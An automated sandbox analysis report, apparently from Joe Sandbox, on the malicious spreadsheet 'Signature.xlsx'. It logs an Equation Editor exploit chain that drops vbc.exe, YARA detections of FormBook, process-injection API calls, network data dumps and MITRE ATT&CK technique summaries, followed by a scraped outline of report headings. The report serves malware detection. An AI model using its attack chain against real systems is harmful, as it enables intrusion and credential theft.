Jan 27, 2021 20:03:03.295252085 CET	11	IN	Data Raw: 61 38 9a 00 00 00 07 1f 78 58 45 04 00 00 00 0a 00 00 00 4e 00 00 00 63 00 00 00 74 00 00 00 1f 7f 28 2c 00 00 06 0b 2b d1 06 20 86 00 00 00 58 45 0c 00 00 00 33 00 00 00 4c 00 00 00 5d 00 00 00 69 00 00 00 72 00 00 00 8b 00 00 00 a5 00 00 00 c2 Data Ascii: a8xXENct(,+ XE3L]ir +\(x(,8x& 8g8X(+8` 8? (,8. 8"8^sQ(R8
Jan 27, 2021 20:03:03.295320988 CET	13	IN	Data Raw: 00 00 00 22 00 00 00 29 00 00 00 33 00 00 00 40 00 00 00 97 00 00 00 a8 00 00 00 bd 00 00 00 c7 00 00 00 f1 00 00 00 02 01 00 00 10 01 00 00 19 01 00 00 2e 01 00 00 1a 13 08 2b ab 02 6f e7 00 00 06 6f 62 00 00 0a 11 04 6f 6c 00 00 0a 1e 13 08 2b Data Ascii: ")3@.+oobol+++8} 8poomoonoo(poo(qloonl[(r8os8(tou8
Jan 27, 2021 20:03:03.295361042 CET	14	IN	Data Raw: 01 00 00 11 01 00 00 1a 01 00 00 3a 01 00 00 44 01 00 00 ab 01 00 00 13 02 00 00 1f 1b 13 15 2b af 00 1f 1c 13 15 2b a8 11 11 39 02 02 00 00 1f 10 13 15 2b 9b 02 6f 1f 01 00 06 02 7b 1e 00 00 04 02 28 55 00 00 06 6f 5a 00 00 0a 7b ba 00 00 04 02 Data Ascii: :D++9+o{(UoZ{oorp((o{oooso8.o!{(UoZ{oorp((o{oo
Jan 27, 2021 20:03:03.295397043 CET	16	IN	Data Raw: 8b 00 00 0a 14 72 05 02 00 70 16 8d 0d 00 00 01 14 14 14 28 8c 00 00 0a 28 8d 00 00 0a 6f 81 00 00 0a 7b c1 00 00 04 02 6f a3 01 00 06 6f 8a 00 00 0a 6f 96 00 00 0a 6f 9b 00 00 0a 00 00 00 2b 0a 6f 87 00 00 0a 38 1e f7 ff ff 00 2b 06 0a 38 05 f7 Data Ascii: rp((o{oooo+o8+8*!0+&+ a8~ Y8+&+(U+oo}o+{oZ{o+(

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 152 Parent PID: 584

General

Start time:	20:02:51
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fed0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2332 Parent PID: 584

General

Start time:	20:03:11
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2852 Parent PID: 2332

General

Start time:	20:03:12
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2876 Parent PID: 2852

General

Start time:	20:03:13
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2468 Parent PID: 2852

General

Start time:	20:03:14
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2460 Parent PID: 2852

General

Start time:	20:03:14
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2424 Parent PID: 2852

General

Start time:	20:03:14
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2420 Parent PID: 2852

General

Start time:	20:03:15
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x210000
File size:	633856 bytes
MD5 hash:	BE84C387975B024F25DC96EC5F85F7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2852 Parent PID: 2332 vbc.exeCOMMON

Executed Functions

Function 003A3519, Relevance: 3.9, Strings: 3, Instructions: 159COMMON

Download Yara Rule

Strings

`!*m, xrefs: 003A35EE
`!*m, xrefs: 003A3669
`!*m, xrefs: 003A3679

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID: `!*m$`!*m$`!*m
API String ID: 0-3236312437
Opcode ID: ee7bb8f886d416f74aa456f19755642d3854f06019da51d1fba0e456393de918
Instruction ID: 1b4a0a591d45f6a5c99b1aa87934f2b69efecfe94f56092d5ad56b14ebfb98ae
Opcode Fuzzy Hash: ee7bb8f886d416f74aa456f19755642d3854f06019da51d1fba0e456393de918
Instruction Fuzzy Hash: 0861A074E012089FDB09DFA9D884AADBBF2FF89300F15816AE905AB365DB319D41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003ABAC0, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2762a7a1dc79b9d110f8d01af63e3ee1ba030cd2e9bebaf64ccb00d06ecaf22c
Instruction ID: a8a0bd7d5f361a5ff10e3869ee57cd0d2b63df3dd31a50434e4e502b34312c87
Opcode Fuzzy Hash: 2762a7a1dc79b9d110f8d01af63e3ee1ba030cd2e9bebaf64ccb00d06ecaf22c
Instruction Fuzzy Hash: 9EA1F174E00208CFDB01DFA9C484ADEFBF6EF8A314F64852AD409AB356DB349981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003A3AC0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca5c4475b905801a68d44a3d6e9a952849d879d0fe6c68e740863f15047e113a
Instruction ID: bf635526ddf150bd7f9c4c8af55612038564d4ceb7b0fecbad553e19c2545de1
Opcode Fuzzy Hash: ca5c4475b905801a68d44a3d6e9a952849d879d0fe6c68e740863f15047e113a
Instruction Fuzzy Hash: 57811774E00209DFCB05DFE9C5456EEBBF6EF8A315F64C525E409AB319D7309A428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003A3808, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e6473d2103f194e71a51d0e4b1213d2af8da553890a4788ab588f99f67a574
Instruction ID: 933f0c2f1e15211f38a252857f297097897e7852442c31c7b830b62fbe802b30
Opcode Fuzzy Hash: e1e6473d2103f194e71a51d0e4b1213d2af8da553890a4788ab588f99f67a574
Instruction Fuzzy Hash: 18812671E00219CBDF55DFA9C8416EEBBBAFF99314F50C469E448B7204EB309A468F50

Uniqueness

Uniqueness Score: -1.00%

Function 003ADA91, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcbd22da8e89107dd1f6f889d28cf6a7a1d5a6433025445096e36dee47df07de
Instruction ID: 374cbfa925a1f33326eb41d2b414aa0cef8c978367affa39726467bd24f5ed48
Opcode Fuzzy Hash: dcbd22da8e89107dd1f6f889d28cf6a7a1d5a6433025445096e36dee47df07de
Instruction Fuzzy Hash: F6215E70D483188BDB19DF6AC8007AABBBBABC6300F14C0FAC409AB265DB341D45DF55

Uniqueness

Uniqueness Score: -1.00%

Function 003ACC67, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003ACF37

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5df78a9de97df5231c2e906e532de7d7f83275164d52c44b69b16c950a6871b2
Instruction ID: 1616a86bbbd70b2bfde172445e4240f83c860f4846949f4f0a85a545de308b3d
Opcode Fuzzy Hash: 5df78a9de97df5231c2e906e532de7d7f83275164d52c44b69b16c950a6871b2
Instruction Fuzzy Hash: 84C12370D002198FDB21CFA8C841BEEBBB1FF4A304F1095AAD919B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 003ACC70, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003ACF37

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c5af7042b7fadf6ab521ebfae3325c7c898a4838416cf844db01c65f6274e1b9
Instruction ID: c36eb6a0d9193ac03d926fdebabaf04f7101ff04e93e36fd4da810111f28a074
Opcode Fuzzy Hash: c5af7042b7fadf6ab521ebfae3325c7c898a4838416cf844db01c65f6274e1b9
Instruction Fuzzy Hash: 62C11370D102198FDB21CFA8C845BEEBBB1FF4A304F0095AAD919B7250DB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 003ACA40, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003ACAF2

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a59606dc4f5b6ca852fd9f247365a1ea534cb8f946f73098f5dead9d1a05f0d2
Instruction ID: a79492b305c6e95d648e94784cfe8d351a03e609ace6bb4ca3cba5a47a4ba7d2
Opcode Fuzzy Hash: a59606dc4f5b6ca852fd9f247365a1ea534cb8f946f73098f5dead9d1a05f0d2
Instruction Fuzzy Hash: BB4198B8D04258DFCF10CFA9D884AEEFBB5BB09314F14A42AE815B7210D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 003AC7C8, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003AC872

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1169ca30478367ba92aa89c64ef770a1a6aab0314c595742b53061aff87827d1
Instruction ID: 2a4ca95a601a0b78959fc6445d89f31d80b0d26bc6044da2e75ce81965d8d9ee
Opcode Fuzzy Hash: 1169ca30478367ba92aa89c64ef770a1a6aab0314c595742b53061aff87827d1
Instruction Fuzzy Hash: 0B3197B8D002589FCF10CFA9D884ADEFBB5FB4A314F10A82AE815B7210D775A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0020D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161585529.000000000020D000.00000040.00000001.sdmp, Offset: 0020D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be24bbcc1a407a992a5c392178c1b4bf68fbaa803b42f4769b5a5d1259b574c4
Instruction ID: bcf21b86c2a6aebadce0bafdde8c46540ab9454ea108f4592128abf92804a9be
Opcode Fuzzy Hash: be24bbcc1a407a992a5c392178c1b4bf68fbaa803b42f4769b5a5d1259b574c4
Instruction Fuzzy Hash: BA212274214304DFDB24CFA4E884B16BB66EB84314F24C969D80E4B387C33BD867CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0020D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161585529.000000000020D000.00000040.00000001.sdmp, Offset: 0020D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
Instruction ID: a52285716b6ce03efe6e2f2e1c068350c83cf259868ba5e00ea21903200d03da
Opcode Fuzzy Hash: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
Instruction Fuzzy Hash: 6A118B75504380DFDB11CF54D584B16BBA2FB84314F28C6AAD8494B696C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161535516.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5fee118511bab53ee31110649dcb95dc40d88b8347b51178b26e0bffe0d414
Instruction ID: 6bc842e85852f3295ab091600dc296549a70b1c319dd1524e4ade18edee6325c
Opcode Fuzzy Hash: 6b5fee118511bab53ee31110649dcb95dc40d88b8347b51178b26e0bffe0d414
Instruction Fuzzy Hash: F801D0314083489AE7209A55EC84777FB9DEF51724F28C45AEF055B286C375DC45C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161535516.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c88d75cd7e7701d1346f23cd69ea41d4b769dbced9cb8f4dd18128b64af1f32
Instruction ID: 3b0ec56b04a3cb9687f411683b6375cce2410bf741cdfa2f82a1e2a386d88bd5
Opcode Fuzzy Hash: 8c88d75cd7e7701d1346f23cd69ea41d4b769dbced9cb8f4dd18128b64af1f32
Instruction Fuzzy Hash: A1F06271404344AAEB108E55E888B73FF98EF51734F28C45AED085B686C379AC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003A57DD, Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

D\j, xrefs: 003A585B
@2*m, xrefs: 003A59E4

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID: @2*m$D\j
API String ID: 0-1467792184
Opcode ID: 8d9e3b7d0a19acabdc6f7bd875f367bc67e9435abc6e1951b69c3990cb3da351
Instruction ID: a0b1f0df7e2a81c06f97fbe094225b208fae083a22217b6888a8c21603f01b50
Opcode Fuzzy Hash: 8d9e3b7d0a19acabdc6f7bd875f367bc67e9435abc6e1951b69c3990cb3da351
Instruction Fuzzy Hash: 1D518D70A0120D8FE749EFB9D890B9EBBF7AB89304F008939D1059B725DF7469068F51

Uniqueness

Uniqueness Score: -1.00%

Function 003A57E0, Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

D\j, xrefs: 003A585B
@2*m, xrefs: 003A59E4

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID: @2*m$D\j
API String ID: 0-1467792184
Opcode ID: 6030ffcca0cdab376775352ef1e62947ea7a3ece392610dbd8e66b045296b7df
Instruction ID: 05f873bdbdfce5aa1ccf05a90dc895b24ea007f8cdca8e473197e0c62a7968cd
Opcode Fuzzy Hash: 6030ffcca0cdab376775352ef1e62947ea7a3ece392610dbd8e66b045296b7df
Instruction Fuzzy Hash: 6E518E70A0120D8FE749EFB9D890A9EBBF7EB89304F008939D1059B725DF7469468F51

Uniqueness

Uniqueness Score: -1.00%

Function 003A8D46, Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

X, xrefs: 003A8D49

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: c545770144a806be5195d40af7b6d8f6148e3fc7c03f9d05bd7754545b732a4f
Instruction ID: 733714d5e551ca99cb8a4c33676766517570c6ae1aa8a06ad67637e52cb89e2e
Opcode Fuzzy Hash: c545770144a806be5195d40af7b6d8f6148e3fc7c03f9d05bd7754545b732a4f
Instruction Fuzzy Hash: 08B18FB0E406298FDBA4DFA9C8847CDBBF1FF49314F0085D5D598A6205EB309A99CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003A5A38, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb498d1344125fbc500a332835970f1ac5f738700d47ea79b28493fe0d8bc7d9
Instruction ID: 3645d93ea75df02762426214e082f36d0bd09c68f3e38311c7d1de91f71a1510
Opcode Fuzzy Hash: eb498d1344125fbc500a332835970f1ac5f738700d47ea79b28493fe0d8bc7d9
Instruction Fuzzy Hash: 54517DB1E016588BEB29CF6B8D4068AFBF7AFC5304F14C5BA850CAB265DB304985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 003ADAD2, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2161797747.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41af2bbf27129b2037c924f3ee3f98892324e7d66fb10fae6954d5a4e251c8b
Instruction ID: 090973bba969df4020d4d5499ce091e926363e6ce6262e32972ef718236d661c
Opcode Fuzzy Hash: f41af2bbf27129b2037c924f3ee3f98892324e7d66fb10fae6954d5a4e251c8b
Instruction Fuzzy Hash: B6112A71D446198BEB2DCF6BC8007DABBF7AFCA300F14C0BA8418AB625DB340985CE41

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Signature.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Signature.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2469416